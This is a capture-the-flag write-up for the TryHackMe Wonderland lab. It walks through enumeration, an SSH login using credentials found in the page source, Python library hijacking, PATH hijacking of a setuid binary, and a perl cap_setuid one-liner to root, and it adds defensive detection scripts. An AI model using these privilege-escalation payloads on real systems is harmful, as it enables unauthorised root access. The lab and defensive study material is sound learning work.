THM Writeup: Wonderland

Writeup for the TryHackMe room Wonderland

Hello! Today, let's solve TryHackMe's challenge Wonderland. This was a pretty fun room and I learned a lot. So, let's dive in!

Enumeration

As always, I start the process with enumeration, and the first thing I do while enumerating is run an nmap scan. (You might notice different IP addresses for the machine; it's because I forgot to expand the time and my machine expired midway -_-)

┌──(kali㉿kali)-[~]
└─$ nmap -sV -sC -Pn 10.10.149.95
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-12 06:48 EST
Nmap scan report for 10.10.149.95
Host is up (0.40s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
|   256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
|_  256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519)
80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 331.56 seconds

Port 80 is open and the title is "Follow the white rabbit." As the room's theme is Alice in Wonderland, this makes sense. Let's visit the page and see what's happening here.

The webpage has a quote from Alice in Wonderland, and a picture of the rabbit. Next, I ran a Gobuster scan and found another directory /r.

┌──(kali㉿kali)-[~/thm/wonderland]
└─$ gobuster dir -u http://10.10.254.173 --wordlist /usr/share/dirb/wordlists/common.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.254.173
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2024/01/12 09:28:27 Starting gobuster in directory enumeration mode
===============================================================
/img                  (Status: 301) [Size: 0] [--> img/]
/index.html           (Status: 301) [Size: 0] [--> ./]
/r                    (Status: 301) [Size: 0] [--> r/]
Progress: 4614 / 4615 (99.98%)
===============================================================
2024/01/12 09:31:13 Finished
===============================================================

Let's go to the new directory and see if there's anything useful.

Again, a quote from the book. I noticed something interesting here. The heading says "Keep Going". Might it mean that there are more sub-directories here? I ran another Gobuster scan and I found another directory! This time it's /a. Here too we find a quote, and the title still says "Keep Going". Now, just a wild guess, but I thought the directories /r and /a might mean it's trying to spell the word rabbit. So, I put /r/a/b/b/i/t and et voila!

Initial Foothold & User Shell

Now, the title changes to "Open the door and enter wonderland". This might mean something. I check the page source and sure enough, we have the credentials for the user alice!

I try to SSH with these credentials and we have a shell as alice. [Hacker Voice] I'm in.

┌──(kali㉿kali)-[~/thm/wonderland]
└─$ ssh alice@10.10.254.173
alice@10.10.254.173's password: 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-101-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri Jan 12 14:37:12 UTC 2024

  System load:  0.0                Processes:           101
  Usage of /:   18.9% of 19.56GB   Users logged in:     2
  Memory usage: 64%                IP address for eth0: 10.10.254.173
  Swap usage:   0%


0 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Fri Jan 12 14:01:18 2024 from 10.8.23.91
alice@wonderland:~$ 

I see there's a root.txt file in alice's home directory instead of a user.txt file. THM's machine page hints that "Everything is upside down here." So, I retrieve the user.txt file from the root folder with cat /root/user.txt.

Privilege Escalation

Now, I run sudo -l and see that alice can run the /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py command as the user rabbit. We have to escalate privileges to the user rabbit somehow. We cannot edit the file walrus_and_the_carpenter.py, but I can at least look at what the code is doing.

import random
poem = """The sun was shining on the sea,
Shining with all his might:
He did his very best to make
The billows smooth and bright —
And this was odd, because it was
The middle of the night.

The moon was shining sulkily,
Because she thought the sun
Had got no business to be there
After the day was done —
"It’s very rude of him," she said,
"To come and spoil the fun!"

...SNIP...

"I weep for you," the Walrus said.
"I deeply sympathize."
With sobs and tears he sorted out
Those of the largest size.
Holding his pocket handkerchief
Before his streaming eyes.

"O Oysters," said the Carpenter.
"You’ve had a pleasant run!
Shall we be trotting home again?"
But answer came there none —
And that was scarcely odd, because
They’d eaten every one."""

for i in range(10):
    line = random.choice(poem.split("\n"))
    print("The line was:\t", line)

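The script reads this poem and prints ten random lines from it. What's interesting here is that the script imports the random module. When Python runs a script, it puts the script's directory first on its module search path, so right now import random resolves to the standard library only because there is no random.py next to the script. If we create a random.py in that directory, the script will import our file instead, and because sudo runs the script as rabbit, it might give us an elevated shell. This is known as Python library hijacking.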

Let's create a random.py file in alice's home directory.

import os
import pty

pty.spawn("/bin/bash")

Now, let's run the command as user rabbit and bingo! This gives us an elevated shell as user rabbit.

alice@wonderland:~$ sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
rabbit@wonderland:~$ 
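
From the defender's side, the condition that made this work can be checked for directly. The following is an added example, not part of the original writeup: it lists which imports of a script would be satisfied by a file sitting beside it, and whether the script's directory is writable by anyone other than root or the sudo target. The function names and the temporary sample layout are constructed for illustration.

```python
import ast
import os
import stat
import sys
import tempfile


def shadowed_imports(script_path):
    """Return (module, path) pairs where a file beside the script wins the import."""
    script_dir = os.path.dirname(os.path.abspath(script_path))
    with open(script_path, encoding="utf-8") as fh:
        tree = ast.parse(fh.read(), filename=script_path)
    wanted = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            wanted.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.level == 0 and node.module:
            wanted.add(node.module.split(".")[0])
    # Compiled-in modules are found before sys.path is searched, so they cannot be shadowed.
    wanted -= set(sys.builtin_module_names)
    findings = []
    for name in sorted(wanted):
        # sys.path[0] is the script's directory, so these candidates are tried first.
        for candidate in (name + ".py", os.path.join(name, "__init__.py")):
            path = os.path.join(script_dir, candidate)
            if os.path.isfile(path):
                findings.append((name, path))
    return findings


def dir_untrusted(script_path, run_as_uid):
    """True if someone other than root or the sudo target can write to the script's directory."""
    st = os.stat(os.path.dirname(os.path.abspath(script_path)))
    return st.st_uid not in (0, run_as_uid) or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def demo():
    """Constructed layout mirroring the writeup: a script importing random, beside a random.py."""
    workdir = tempfile.mkdtemp()
    script = os.path.join(workdir, "walrus_and_the_carpenter.py")
    with open(script, "w", encoding="utf-8") as fh:
        fh.write("import random\nprint(random.choice(['a', 'b']))\n")
    with open(os.path.join(workdir, "random.py"), "w", encoding="utf-8") as fh:
        fh.write("# constructed placeholder for a shadowing module\n")
    return script, shadowed_imports(script)


if __name__ == "__main__":
    script, hits = demo()
    for module, path in hits:
        print(f"{script}: 'import {module}' would load {path}")
```

Running the interpreter with -I (isolated mode) keeps the script's directory off sys.path, which is one way to close this in a sudoers rule like the one above; keeping the script in a directory only root can write to is the other.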

Now, rabbit's home directory has only one file, the binary executable teaParty. I transfer this on my host machine and execute it.

┌──(kali㉿kali)-[~/thm/wonderland]
└─$ ./teaParty       
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by Fri, 12 Jan 2024 10:49:02 -0500
Ask very nicely, and I will give you some tea while you wait for him

So, this tells me that "Mad Hatter" will be here soon. Judging from the /etc/passwd file, there is a user named hatter. I also examine the contents of teaParty and see that the date variable can be hijacked. This can give us an elevated shell as hatter.

┌──(kali㉿kali)-[~/thm/wonderland]
└─$ strings teaParty      
/lib64/ld-linux-x86-64.so.2
2U~4
libc.so.6
setuid
puts
getchar
system
__cxa_finalize
setgid
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
Welcome to the tea party!
The Mad Hatter will be here soon.
/bin/echo -n 'Probably by ' && date --date='next hour' -R
Ask very nicely, and I will give you some tea while you wait for him
Segmentation fault (core dumped)
;*3$"
GCC: (Debian 8.3.0-6) 8.3.0
...SNIP...

First, I will put the /tmp directory at the front of PATH, so whenever the binary looks up a command by name it will check the /tmp folder first.

rabbit@wonderland:/home/rabbit$ export PATH=/tmp:$PATH
rabbit@wonderland:/home/rabbit$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

Now, we will create a date file in the /tmp directory with the following contents and make it executable with chmod +x date.

date
#!/bin/bash
/bin/bash

This is known as path hijacking. Our binary prints the hatter's arrival time by running date, and as the strings output shows, it calls date by name rather than by absolute path (unlike /bin/echo). Now, with /tmp at the front of PATH, the lookup for date finds our shell script in /tmp first, executes it, and gives us an elevated shell as hatter.

Now, let's execute the binary.

rabbit@wonderland:/home/rabbit$ ./teaParty
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by hatter@wonderland:/home/rabbit$
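
The weakness is visible in the strings output alone: one command in the shell string is given by absolute path and the other is not. As an added example (not from the original writeup), this heuristic triage parses shell-looking strings from a binary and reports commands that would be resolved through PATH. The sample lines are copied from the strings output above, the builtin list is partial, and all names are constructed for illustration; it needs Python 3.8 or later.

```python
import shlex

CONTROL = {"&&", "||", ";", "|", "&"}   # tokens after which a new command word starts
PUNCT = set("();<>|&")
# Partial list of sh builtins, which are never looked up in PATH (assumption: dash or bash).
BUILTINS = {"cd", "echo", "exit", "export", "read", "set", "test", "true", "false", "[", ":"}

CMD = "/bin/echo -n 'Probably by ' && date --date='next hour' -R"
SAMPLE_STRINGS = [
    "libc.so.6", "system", "Welcome to the tea party!", CMD,
    "Ask very nicely, and I will give you some tea while you wait for him",
    ';*3$"', "GCC: (Debian 8.3.0-6) 8.3.0",
]


def tokens(command):
    """Split a shell string into words and operators; raises ValueError on unbalanced quotes."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)


def relative_commands(command):
    """Return command words that contain no '/', i.e. that the shell resolves through PATH."""
    found, expect = [], True
    for tok in tokens(command):
        if tok in CONTROL:
            expect = True
        elif expect and not set(tok) <= PUNCT:
            name, sep, _ = tok.partition("=")
            if sep and name.isidentifier():
                continue                 # VAR=value prefix, the command word comes next
            expect = False
            if "/" not in tok and tok not in BUILTINS:
                found.append(tok)
    return found


def triage(strings_lines):
    """Map each shell-looking line to its PATH-resolved commands; other lines are ignored."""
    report = {}
    for line in strings_lines:
        try:
            if CONTROL.intersection(tokens(line)):   # only lines with a shell operator
                hits = relative_commands(line)
                if hits:
                    report[line] = hits
        except ValueError:
            continue                     # unbalanced quotes: binary noise, not a command
    return report
```

A finding here means the binary should call the program by absolute path (as it already does for /bin/echo) or set a fixed PATH before invoking the shell.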

Et voila! We have the shell as hatter. Under hatter's home directory there is a single file called password.txt which just stores the password in cleartext. I am guessing this is hatter's password, like we had alice's password. SSH-ing to hatter with this password gives me a full shell.

Now, I run the usual linpeas.sh and find that the perl executable has a capability which can help me escalate privileges.

/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep

Check out the following resources to learn more about linux capabilities.

With the help of the above resource, I find a one-liner perl code to gain root privileges. I execute it and bingo! The TryHackMe room Wonderland is solved!

hatter@wonderland:/tmp$ perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'
root@wonderland:/tmp# whoami
root
root@wonderland:/tmp#

Find the root flag under /home/alice/root.txt. I learned a lot about path hijacking and Linux capabilities with this room. Thank you for reading and I will see you in the next writeup. Adios!
